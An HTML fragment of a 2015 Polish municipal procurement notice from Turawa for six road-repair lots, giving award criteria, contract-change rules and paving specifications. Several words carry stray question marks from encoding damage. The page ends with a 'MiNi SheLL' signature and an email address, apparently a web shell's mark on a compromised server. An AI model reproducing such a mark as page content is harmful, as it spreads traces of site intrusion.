</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz ofertowy  (zgodnie z  załącznikami nr 1a - 1f  do SIWZ - odpowiednio do danej części zamówienia);
2.	oświadczenie o spełnieniu warunków udziału w postępowaniu (zgodnie z załącznikiem nr 2 do SIWZ);
3.	kosztorys ofertowy - sporządzony na podstawie załączonych do niniejszej SIWZ przedmiarów robót - załączniki nr  9a 1, 9a 2, 9b, 9c, 9d, 9e, 9f (odpowiednio do danej części zamówienia);
4.	dowód wpłaty wadium dotyczący danej części.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. 
1)	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
2)	Zmiany umowy mogą dotyczyć:
a)	wystąpienia wyjątkowych okoliczności, niezależnych od stron umowy, których nie można było przewidzieć w chwili zawierania umowy, a wpływają na jej realizację;
b)	zmiany podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował Zamawiający;
c)	zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót budowlanych;
d)	wykonania robót budowlanych innego rodzaju niż te, które zostały przewidziane w dokumentacji projektowej lub wykonania robót pomocniczych i wspomagających;
e)	aktualizacji rozwiązań projektowych z uwagi na postęp techno?logiczny;
f)	zmiany wymiarów, położenia lub wysokości części robót budow?lanych;
g)	zmiany w kolejności i terminach wykonywania robót budowlanych;
h)	zmiany ilości robót budowlanych lub dostaw w stosunku do przedmiaru, pod warunkiem że wynikają one z dokumentacji projektowej i zasad wiedzy technicznej,
i)	rezygnacji z wykonania części robót budowlanych, nieprzekra?czających jednak 30% wynagrodzenia Wykonawcy,
j)	terminu wykonania przedmiotu umowy, jeżeli wystąpią przyczyny niezależne od działań leżących po stronie Wykonawcy.
3)	Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową, w sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami.
4)	Roboty zamienne możliwe do wykonania w ramach zmiany umowy zawsze będą robotami dotyczącymi robót budowlanych objętych zakresem umowy, ale o innym charakterze niż pierwotnie planowano. Roboty zamienne muszą odpowiadać warunkom (np. standard, funkcjonalność) opisa?nym w dokumentach przetargowych;
5)	Jeżeli zmiana, o której mowa w ust. 2) wymaga zmiany dokumenta?cji projektowej lub specyfikacji technicznych wykonania i odbioru robót budowlanych, strona inicjująca zmianę przedstawia projekt zamienny zawierający opis proponowanych zmian oraz przedmiar i niezbędne rysunki. Projekt taki wymaga akceptacji projektanta i zatwierdzenia do realizacji przez zamawiającego.
6)	Warunkiem dokonania zmian, o których mowa w ust. 2), jest złożenie wniosku przez stronę inicjującą, który zawiera:
a)	opis propozycji zmiany;
b)	uzasadnienie zmiany;
c)	obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy;
d)	opis wpływu zmiany na termin wykonania umowy.
7)	Zmiany, o których mowa w ust. 2), mogą zostać dokonane, jeżeli ich uzasadnieniem są niżej wymienione okoliczności:
a)	obniżenie kosztu wykonania robót lub kosztu eksploatacji (użyt?kowania) obiektu;
b)	zmiana obowiązujących przepisów prawa;
c)	podniesienie bezpieczeństwa wykonywania robót;
d)	usprawnienia procesu budowy i użytkowania obiektu;
e)	opóźnienia, utrudnienia, zawieszenia w wykonywaniu robót lub przeszkody spowodowane z przyczyn niezależnych od działań Wykonawcy;
f)	zaistnienie nieprzewidzianych w umowie warunków geologicz?nych, hydrogeologicznych, wykopalisk, wyjątkowo niekorzyst?nych warunków atmosferycznych, a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie umowy na przewi?dzianych w niej warunkach;
g)	siła wyższa.
8)	Zamawiający dopuszcza wprowadzenie zamiany materiałów przedstawionych w ofercie przetargowej, pod warunkiem że zmiany te będą korzystne dla Zamawiającego. Będą to np. okoliczności: 
a)	powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy, które nie obniżają parametrów technicznych;
b)	powodujące poprawienie parametrów technicznych,
c)	wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.
9)	Podstawę obliczenia kosztów zmiany, o której mowa w ust.  6 punkt c), w przypadku gdy zmiany będą wynikać ze zmiany dokumentacji projektowej lub specyfikacji technicznych wykonania odbioru robót, stanowi projekt zamienny, o którym mowa w punkcie 5), oraz:
a)	kosztorys ofertowy opracowany, na podstawie cen jednostko?wych lub dane wyjściowe do kosztorysowania przyjęte do spo?rządzenia kosztorysu ofertowego wykonawcy, ceny jednost?kowe pracy sprzętu i materiałów zaproponowanych przez wykonawcę, ale nie większe niż średnie ceny np. SEKOCENBUD dla kwartału poprzedzającego termin wykonania robót budowlanych lub
b)	kalkulacja uproszczona sporządzona w oparciu o uzgodniony z Zamawiającym publikator cen jednostkowych robót budow?lanych, np. SEKOCENBUD dla kwartału poprzedzającego termin wykonania robót budowlanych.
10)	Wykonawca może dokonywać zmiany osób odpowiedzialnych za kierowanie robotami budowlanymi i odpowiedzialnymi za wykonanie zamówienia, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiające?go, akceptującego nowe osoby z wyłączeniem sytuacji określonej w ust. 11 punkt a).
11)	Wykonawca z własnej inicjatywy proponuje zmianę osób odpowiedzialnych za wykonanie zamówienia  w następujących przypadkach:
a)	śmierci i długotrwałej choroby powyżej 30 dni;
b)	niewywiązywania się osoby  odpowiedzialnej za wykonanie zamówienia z obowiązków wyni?kających z umowy;
c)	jeżeli zmiana osoby  odpowiedzialnej za wykonanie zamówienia stanie się konieczna z jakichkol?wiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji itp.).
12)	Zamawiający może zażądać od Wykonawcy zmiany osób  odpowiedzialnych za wykonanie zamówienia, jeżeli uzna, że osoby te nie wykonują swoich obowiązków wynikających z umowy.
13)	W przypadku zmiany osoby  odpowiedzialnej za wykonanie zamówienia nowa osoba musi spełniać wymagania określone w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.turawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Turawa,
ul. Opolska 39c,
46-045 Turawa,
pokój nr 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2015 godzina 10:00, miejsce: Urząd Gminy Turawa,
ul. Opolska 39c,
46-045 Turawa,
pokój nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie częściowe nr I - Remont drogi gminnej - ulicy Dobrodzieńskiej                   w miejscowości Ligota Turawska (etap I) - odcinek A-B i C-D..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ogólny obmiar inwestycji:
1)	odcinek A-B:
a)	Długość odcinka  - 98,00 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2)	odcinek C-D:
a)	Długość odcinka  - 146,00 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m lub do granicy działki;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.	 Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korytowanie istniejącej nawierzchni;
c)	Wykonanie dolnej warstwy podbudowy z kruszywa łamanego 0-63 mm gr. 15 cm;
d)	Wykonanie górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm gr. 10 cm;
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	   Niweletę drogi należy dostosować do wysokości istniejących bram wjazdowych;
g)	Wykonanie dywanika z betonu asfaltowego - grub. 8 cm (w dwóch warstwach: 4 cm warstwa wyrównawcza (wiążąca) AC16W 50/70  i 4 cm warstwa ścieralna AC11S 50/70);
h)	Uzupełnienie poboczy z kruszywa łamanego 0-31,5 mm - grub. 8 cm;
i)	  Wykonanie oznakowania pionowego;
j)	Uporządkowanie terenu plantowanie;
k)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną;

3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10a i 11a do  Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie częściowe nr II - Remont drogi gminnej - ulicy Leśnej                              w miejscowości Kadłub Turawski - odcinek E-F.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ogólny obmiar inwestycji:
a)	Długość odcinka  - 200 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,75 m lub do granicy działki;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.	Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korytowanie istniejącej nawierzchni;
c)	Wykonanie dolnej warstwy podbudowy z kruszywa łamanego 0-63 mm gr. 15 cm;
d)	Wykonanie górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm gr. 10 cm;
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Niweletę drogi należy dostosować do wysokości istniejących bram wjazdowych;
g)	Wykonanie dywanika z betonu asfaltowego - grub. 8 cm (w dwóch warstwach: 4 cm warstwa wyrównawcza (wiążąca) AC16W 50/70  i 4 cm warstwa ścieralna AC11S 50/70);
h)	Uzupełnienie poboczy z kruszywa łamanego 0-31,5 mm - grub. 8 cm;
i)	Wykonanie oznakowania pionowego;
j)	Uporządkowanie terenu plantowanie;
k)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną;

3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10b i 11b do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie częściowe nr III - Remont drogi gminnej - ulicy Kolanowskiej                             w miejscowości Zawada (etap I) - odcinek A-B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ogólny obmiar inwestycji:
a)	Długość odcinka  - 127 mb;
b)	Szerokość jezdni -  3,5 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.	Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korygowanie nawierzchni drogi;
c)	Wykonanie dolnej warstwy podbudowy z kamienia granitowego lub bazaltowego 0-63 mm gr. 15 cm (dotyczy również poboczy);
d)	Wykonanie górnej warstwy podbudowy z kamienia granitowego lub bazaltowego 0-31,5 mm gr. 15 cm (dotyczy również poboczy);
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Oś drogi należy dostosować do warunków terenowych;
g)	Skroplenie emulsją asfaltową w ilości 1,0kg/m2;
h)	Wykonanie warstwy wiążącej z betonu asfaltowego AC16W 50/70 grub. 4 cm;
i)	Skroplenie emulsją asfaltową w ilości 0,5kg/m2;
j)	Wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 grub. grub. 4 cm;
k)	Uzupełnienie poboczy kruszywem łamanym 0-31,5 mm - grub. 8 cm; szer. 0,50 m;
l)	Uporządkowanie terenu plantowanie;
m)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną.

3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10c i 11c do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie częściowe nr IV - Remont drogi gminnej - bocznej od ulicy Cmentarnej w miejscowości Osowiec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ogólny obmiar inwestycji:
a)	Długość odcinka  - 143 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.	  Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korytowanie istniejącej nawierzchni;
c)	Wykonanie dolnej warstwy podbudowy z kruszywa łamanego 0-63 mm gr. 15 cm;
d)	Wykonanie górnej warstwy podbudowy z kruszywa łamanego 0-31,5 mm gr. 10 cm;
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Niweletę drogi należy dostosować do wysokości istniejących bram wjazdowych;
g)	Wykonanie dywanika z betonu asfaltowego - grub. 8 cm (w dwóch warstwach: 4 cm warstwa wyrównawcza (wiążąca) AC16W 50/70  i 4 cm warstwa ścieralna AC11S 50/70);
h)	Uzupełnienie poboczy z kruszywa łamanego 0-31,5 mm - grub. 8 cm;
i)	Wykonanie oznakowania pionowego;
j)	Uporządkowanie terenu plantowanie;
k)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną;

3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10d i 11d do  Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie częściowe nr V - Remont drogi gminnej - ulicy Nadleśnej w miejscowości Bierdzany (etap I) - odcinek C-D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ogólny obmiar inwestycji:
a)	Długość odcinka  - 110 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.	Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korygowanie nawierzchni drogi;
c)	Wykonanie dolnej warstwy podbudowy z kamienia granitowego lub bazaltowego 0-63 mm gr. 15 cm (dotyczy również poboczy);
d)	Wykonanie górnej warstwy podbudowy z kamienia granitowego lub bazaltowego 0-31,5 mm gr. 15 cm (dotyczy również poboczy);
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Oś drogi należy dostosować do warunków terenowych;
g)	Skroplenie emulsją asfaltową w ilości 1,0kg/m2;
h)	Wykonanie warstwy wiążącej z betonu asfaltowego AC16W 50/70 grub. 4 cm;
i)	Skroplenie emulsją asfaltową w ilości 0,5kg/m2;
j)	Wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 grub. grub. 4 cm;
k)	Uzupełnienie poboczy kruszywem łamanym 0-31,5 mm - grub. 8 cm; szer. 0,50 m;
l)	Uporządkowanie terenu plantowanie;
m)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną.

3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10e i 11e do  Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie częściowe nr VI - Remont drogi gminnej - ulicy Dębowej                            w miejscowości Bierdzany  - odcinek A-B i C-D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ogólny obmiar inwestycji:
1)	odcinek A-B:
a)	Długość odcinka  - 176,50 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2)	odcinek C-D:
a)	Długość odcinka  - 60,0 mb;
b)	Szerokość jezdni -  3,0 m;
c)	Szerokość poboczy z kamienia - 2 x 0,5 m;
d)	Rodzaj nawierzchni jezdni - beton asfaltowy.

2.	Zakres zamówienia obejmuje:
a)	Roboty przygotowawcze i pomiarowe;
b)	Korygowanie nawierzchni drogi;
c)	Wykonanie warstwy podbudowy z kamienia łamanego granitowego lub bazaltowego 0-31,5 mm gr. 20cm (dotyczy również poboczy);
d)	Na odcinku C-D zachodzi konieczność poszerzenia korony drogi pod nową konstrukcję. W związku z tym konieczne jest dodatkowe zdjęcie humusu i wbudowanie nasypu z pospółki.
e)	Wyrównanie i zagęszczenie do uzyskania właściwej niwelety;
f)	Wykonanie warstwy wyrównawczej (wiążącej) z betonu asfaltowego AC16W 50/70 grub. 3 cm;
g)	Wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 grub. 4 cm;
h)	Uzupełnienie poboczy kruszywem łamanym 0-31,5 mm -szer. 0,50 m;
i)	Uporządkowanie terenu plantowanie;
j)	Skompletowanie i przekazanie Zamawiającemu operatu powykonawczego inwestycji wraz z inwentaryzacją geodezyjną.

3.	Szczegółowy opis i zakres przedmiotu zamówienia oraz jego parametry techniczne przedstawione zostały w dokumentacji projektowej oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, stanowiących załączniki nr 10f i 11f do  Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com